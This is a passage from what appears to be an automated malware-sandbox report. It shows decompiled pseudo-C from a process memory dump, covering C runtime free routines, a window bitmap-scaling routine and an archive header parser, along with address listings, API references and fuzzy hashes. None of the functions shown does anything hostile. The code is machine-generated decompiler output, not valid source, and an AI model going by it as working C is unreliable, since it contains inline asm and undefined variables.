						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00857AC6(_t47);
							E0085B4BC( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00857AC6( *((intOrPtr*)(_t74 + 0x7c)));
						E00857AC6( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00857AC6( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00857AC6( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00857AC6( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00857AC6( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0085B952( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x86d818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00857AC6(_t31);
							E00857AC6( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00857AC6(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00857AC6(_t74);
			}

0x0085b7e7
0x0085b7eb
0x0085b7f3
0x0085b7fc
0x0085b801
0x0085b808
0x0085b810
0x0085b818
0x0085b823
0x0085b829
0x0085b82a
0x0085b832
0x0085b83a
0x0085b845
0x0085b84b
0x0085b84f
0x0085b85a
0x0085b860
0x0085b801
0x0085b861
0x0085b869
0x0085b87c
0x0085b88f
0x0085b89d
0x0085b8a8
0x0085b8ad
0x0085b8b6
0x0085b8be
0x0085b8bf
0x0085b8c5
0x0085b8c8
0x0085b8cb
0x0085b8d2
0x0085b8d4
0x0085b8d8
0x0085b8e0
0x0085b8e7
0x0085b8ed
0x0085b8ee
0x0085b8ee
0x0085b8f5
0x0085b8f7
0x0085b8fc
0x0085b904
0x0085b909
0x0085b90a
0x0085b90a
0x0085b90d
0x0085b910
0x0085b913
0x0085b916
0x0085b916
0x0085b928

APIs

___free_lconv_mon.LIBCMT ref: 0085B823

Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B3DB
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B3ED
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B3FF
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B411
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B423
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B435
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B447
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B459
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B46B
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B47D
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B48F
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B4A1
Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B4B3

_free.LIBCMT ref: 0085B818

Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE

_free.LIBCMT ref: 0085B83A
_free.LIBCMT ref: 0085B84F
_free.LIBCMT ref: 0085B85A
_free.LIBCMT ref: 0085B87C
_free.LIBCMT ref: 0085B88F
_free.LIBCMT ref: 0085B89D
_free.LIBCMT ref: 0085B8A8
_free.LIBCMT ref: 0085B8E0
_free.LIBCMT ref: 0085B8E7
_free.LIBCMT ref: 0085B904
_free.LIBCMT ref: 0085B91C

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: fa607964d2ec0f230f8e713a6842d88313795881b9104556deacac59d888fd88
Instruction ID: 96eb8b136f57b044cd5ecaaba6f05c0fc0d9d413e4ccbe0748ee16cf9cbbb0b2
Opcode Fuzzy Hash: fa607964d2ec0f230f8e713a6842d88313795881b9104556deacac59d888fd88
Instruction Fuzzy Hash: 5B315E31A04305AFEB31AE39E845B5A77ECFF50392F149429FC58D7252DB30AD488B11

Uniqueness

Uniqueness Score: -1.00%

Function 0084C399, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0084C399(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				short _v4124;
				void* _t10;
				struct HWND__* _t11;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				struct HWND__* _t34;
				void* _t45;

				_t45 = __fp0;
				_t29 = __edx;
				E0084D9C0();
				_t10 = E0084959D(__eflags);
				if(_t10 == 0) {
					return _t10;
				}
				_t11 = GetWindow(_a4, 5);
				_t34 = _t11;
				_t31 = 0;
				_a4 = _t34;
				if(_t34 == 0) {
					L11:
					return _t11;
				}
				while(_t31 < 0x200) {
					GetClassNameW(_t34,  &_v4124, 0x800);
					if(E00841438( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t28 = SendMessageW(_t34, 0x173, 0, 0);
						if(_t28 != 0) {
							GetObjectW(_t28, 0x18,  &_v28);
							_t21 = E008495FF(_v20);
							SendMessageW(_t34, 0x172, 0, E008497D0(_t29, _t45, _t28, E008495BC(_v24), _t21));
							DeleteObject(_t28);
						}
					}
					_t11 = GetWindow(_t34, 2);
					_t34 = _t11;
					if(_t34 != _a4) {
						_t31 = _t31 + 1;
						if(_t34 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x0084c399
0x0084c399
0x0084c3a1
0x0084c3a6
0x0084c3ad
0x0084c484
0x0084c484
0x0084c3ba
0x0084c3c0
0x0084c3c2
0x0084c3c4
0x0084c3c9
0x0084c47f
0x00000000
0x0084c480
0x0084c3d0
0x0084c3e9
0x0084c402
0x0084c424
0x0084c428
0x0084c431
0x0084c43a
0x0084c458
0x0084c45f
0x0084c45f
0x0084c428
0x0084c468
0x0084c46e
0x0084c473
0x0084c475
0x0084c478
0x00000000
0x00000000
0x0084c478
0x00000000
0x0084c473
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 0084C3BA
GetClassNameW.USER32(00000000,?,00000800), ref: 0084C3E9

Part of subcall function 00841438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0083ADA2,?,?,?,0083AD51,?,-00000002,?,00000000,?), ref: 0084144E

GetWindowLongW.USER32(00000000,000000F0), ref: 0084C407
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0084C41E
GetObjectW.GDI32(00000000,00000018,?), ref: 0084C431

Part of subcall function 008495FF: GetDC.USER32(00000000), ref: 0084960B
Part of subcall function 008495FF: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0084961A
Part of subcall function 008495FF: ReleaseDC.USER32(00000000,00000000), ref: 00849628

Part of subcall function 008495BC: GetDC.USER32(00000000), ref: 008495C8
Part of subcall function 008495BC: GetDeviceCaps.GDI32(00000000,00000058), ref: 008495D7
Part of subcall function 008495BC: ReleaseDC.USER32(00000000,00000000), ref: 008495E5

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0084C458
DeleteObject.GDI32(00000000), ref: 0084C45F
GetWindow.USER32(00000000,00000002), ref: 0084C468

Strings

STATIC, xrefs: 0084C3EF

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 1444658586-1882779555
Opcode ID: ce47bc7f68279f716f5691e0c3f459f0351846cc00c0d7d0f8e1be33f2eb9f6a
Instruction ID: b975213cbde40a2cd06a5aac24737e5a085af77cf8651e78d105703df4bcbb39
Opcode Fuzzy Hash: ce47bc7f68279f716f5691e0c3f459f0351846cc00c0d7d0f8e1be33f2eb9f6a
Instruction Fuzzy Hash: E521C372A4172C7BEB216B649C4AFEF762CFB15B10F015111FA41E6191CAA44A4186A9

Uniqueness

Uniqueness Score: -1.00%

Function 0085847D, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085847D(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x864be0) {
					E00857AC6(_t52);
					_t26 = _a4;
				}
				E00857AC6( *((intOrPtr*)(_t26 + 0x3c)));
				E00857AC6( *((intOrPtr*)(_a4 + 0x30)));
				E00857AC6( *((intOrPtr*)(_a4 + 0x34)));
				E00857AC6( *((intOrPtr*)(_a4 + 0x38)));
				E00857AC6( *((intOrPtr*)(_a4 + 0x28)));
				E00857AC6( *((intOrPtr*)(_a4 + 0x2c)));
				E00857AC6( *((intOrPtr*)(_a4 + 0x40)));
				E00857AC6( *((intOrPtr*)(_a4 + 0x44)));
				E00857AC6( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00858343(5,  &_v8);
				_v8 =  &_a4;
				return E00858393(4,  &_v8);
			}

0x00858483
0x00858486
0x0085848e
0x00858491
0x00858496
0x00858499
0x0085849d
0x008584a8
0x008584b3
0x008584be
0x008584c9
0x008584d4
0x008584df
0x008584ea
0x008584f8
0x00858500
0x00858509
0x00858511
0x00858525

APIs

_free.LIBCMT ref: 00858491

Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE

_free.LIBCMT ref: 0085849D
_free.LIBCMT ref: 008584A8
_free.LIBCMT ref: 008584B3
_free.LIBCMT ref: 008584BE
_free.LIBCMT ref: 008584C9
_free.LIBCMT ref: 008584D4
_free.LIBCMT ref: 008584DF
_free.LIBCMT ref: 008584EA
_free.LIBCMT ref: 008584F8

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a8a36c13d1225145bac788d21c89b73516eb21a147c0e1125c9d561d064d59c4
Instruction ID: f7904fee7d9a8a5b8895d1ea4742885ef918140bb2b84cf9c7f63e92d6505de7
Opcode Fuzzy Hash: a8a36c13d1225145bac788d21c89b73516eb21a147c0e1125c9d561d064d59c4
Instruction Fuzzy Hash: E011A476104118FFCB02EF98D942CDD3FA9FF44351B0585A1BE088F222EA31EB589B81

Uniqueness

Uniqueness Score: -1.00%

Function 008320F7, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E008320F7(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E0084D9C0();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E0083C43B(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E0083C43B(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E0083C43B(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E0083C43B(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E0083C43B(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E0083C43B(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E0083C43B(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E0083C2EE(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00833F53(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00833EFE(_t257, _t240 + 0x28, _t167);
												}
												E0083C39D(_t318, _t240 + 0x10a1, 0x10);
												E0083C39D(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E0083C39D(_t318, _t240 + 0x10c2, 8);
													E0083C39D(_t318, _t344 + 0x30, 4);
													E0083F55A(_t344 + 0x58);
													E0083F5A0(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E0083F46B(_t344 + 0x5c);
													_t161 = E0084F3CA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E0084F3CA(_t325, 0x862398, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00833F53(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00833EFE(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E0083C43B(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E0083C39D(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E0083C43B(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00840A8C(_t240 + 0x1040, _t315, E0083C37D(_t278, __eflags), _t315);
													} else {
														E00840A4D(_t240 + 0x1040, _t315, E0083C33B(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00840A8C(_t240 + 0x1048, _t315, E0083C37D(_t275, __eflags), _t315);
													} else {
														E00840A4D(_t240 + 0x1048, _t315, E0083C33B(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00840A8C(_t240 + 0x1050, _t315, E0083C37D(_t272, __eflags), _t315);
													} else {
														E00840A4D(_t240 + 0x1050, _t315, E0083C33B(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E0083C33B(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E008406F8(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E0083C33B(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E008406F8(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E0083C33B(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E008406F8(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E0083C43B(_t315);
												__eflags = E0083C43B(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00833F53(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E0083FABF(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E0083C43B(_t315);
											 *(_t240 + 0x2104) = E0083C43B(_t315) & 0x00000001;
											_t331 = E0083C43B(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E0083C39D(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E0083BA7B(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E008410BC();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E0083C43B(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E0083C43B(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E0083C39D(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E0083C43B(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E0083C39D(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E0083C43B(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E0083C43B(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00831FC9(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}

0x008320fc
0x00832102
0x00832109
0x0083210d
0x00832112
0x0083211c
0x00832773
0x0083277a
0x0083277a
0x00832122
0x00832124
0x0083212a
0x00832131
0x0083213a
0x0083213c
0x00832141
0x00832143
0x00832145
0x00000000
0x00000000
0x00832158
0x0083215b
0x0083215d
0x00000000
0x00000000
0x00832163
0x00832165
0x00000000
0x00832175
0x00832175
0x0083217a
0x0083217e
0x00832183
0x00832186
0x00832188
0x0083218a
0x0083218c
0x00832190
0x00832194
0x00000000
0x008321a4
0x008321a8
0x008321b9
0x008321bd
0x008321c2
0x008321c8
0x008321cc
0x008321d5
0x008321ed
0x008321ef
0x008321f2
0x008321f2
0x008321f5
0x008321f5
0x008321fb
0x008321ff
0x00832208
0x00832220
0x00832222
0x00832225
0x00832225
0x00832208
0x00832228
0x0083222c
0x0083222c
0x00832234
0x00832240
0x00832242
0x00000000
0x00832253
0x00832253
0x00832256
0x00832605
0x0083260a
0x0083260c
0x0083263c
0x0083264a
0x00832652
0x0083265d
0x00832660
0x00832666
0x00832669
0x00832678
0x0083267d
0x00832681
0x00832685
0x0083268d
0x0083268d
0x0083269d
0x008326ad
0x008326b2
0x008326b9
0x008326c1
0x008326ca
0x008326d8
0x008326e2
0x008326ef
0x008326f8
0x008326fe
0x0083270f
0x00832714
0x00832719
0x0083271d
0x00832721
0x00832727
0x00832731
0x00832736
0x00832739
0x0083273b
0x0083273d
0x0083273d
0x0083273b
0x00832727
0x00832743
0x0083274a
0x00832754
0x0083260e
0x0083261b
0x00832620
0x00832624
0x00832628
0x00832630
0x00832630
0x00000000
0x0083260c
0x0083225c
0x0083225f
0x008325de
0x008325e3
0x008325e5
0x00000000
0x00000000
0x008325eb
0x008325f3
0x008325fd
0x008322b4
0x008322b6
0x00000000
0x008322b6
0x00832265
0x00832268
0x0083245f
0x00832461
0x00000000
0x00000000
0x00832467
0x00832472
0x00832474
0x00832479
0x0083247d
0x0083247f
0x00832485
0x00832489
0x00832489
0x0083248c
0x00832490
0x00832492
0x00832494
0x00832496
0x008324ba
0x00832498
0x008324a6
0x008324a6
0x008324bf
0x008324c3
0x008324c3
0x008324c7
0x008324c7
0x008324ca
0x008324ce
0x008324d0
0x008324d2
0x008324d4
0x008324f8
0x008324d6
0x008324e4
0x008324e4
0x008324d4
0x008324fd
0x00832503
0x00832503
0x00832506
0x0083250a
0x0083250c
0x00832511
0x00832513
0x00832537
0x00832515
0x00832523
0x00832523
0x0083253c
0x0083253c
0x00832540
0x00832545
0x0083254b
0x0083254d
0x00832553
0x00832558
0x00832581
0x00832586
0x0083255a
0x0083255c
0x00832561
0x00832566
0x0083256b
0x0083256d
0x0083256f
0x0083257a
0x0083257a
0x0083256f
0x0083258b
0x00832590
0x00832599
0x0083259b
0x0083259d
0x008325a8
0x008325a8
0x0083259d
0x008325ad
0x008325b2
0x008325bf
0x008325c1
0x008325c3
0x008325d2
0x008325d2
0x008325c3
0x008325b2
0x0083254d
0x00000000
0x00832545
0x00832469
0x0083246c
0x00000000
0x00000000
0x00000000
0x0083246c
0x0083226e
0x00832271
0x00832402
0x00832404
0x00000000
0x00000000
0x0083240a
0x00832415
0x00832417
0x00832423
0x00832425
0x00832435
0x0083243f
0x00832444
0x00832455
0x00832455
0x00000000
0x00832425
0x0083240c
0x0083240f
0x00000000
0x00000000
0x00000000
0x0083240f
0x00832277
0x0083227a
0x0083238d
0x0083239c
0x008323a7
0x008323a9
0x008323b1
0x008323b7
0x008323c4
0x008323c9
0x008323c9
0x008323df
0x008323e4
0x008323ef
0x008323f7
0x008323f8
0x00000000
0x008323f8
0x00832280
0x00832283
0x008322c2
0x008322c9
0x008322d0
0x008322d9
0x008322e7
0x008322ed
0x008322f4
0x008322f8
0x008322fa
0x00832303
0x0083230a
0x0083230c
0x0083230e
0x0083230e
0x00832314
0x00832319
0x0083231d
0x0083231d
0x00832321
0x00832323
0x0083232c
0x00832333
0x00832335
0x00832337
0x00832337
0x0083233a
0x00832343
0x00832348
0x00832348
0x0083234c
0x00832353
0x0083235c
0x0083235c
0x00832362
0x00832369
0x00832372
0x00832372
0x00832378
0x00000000
0x00832378
0x00832288
0x00000000
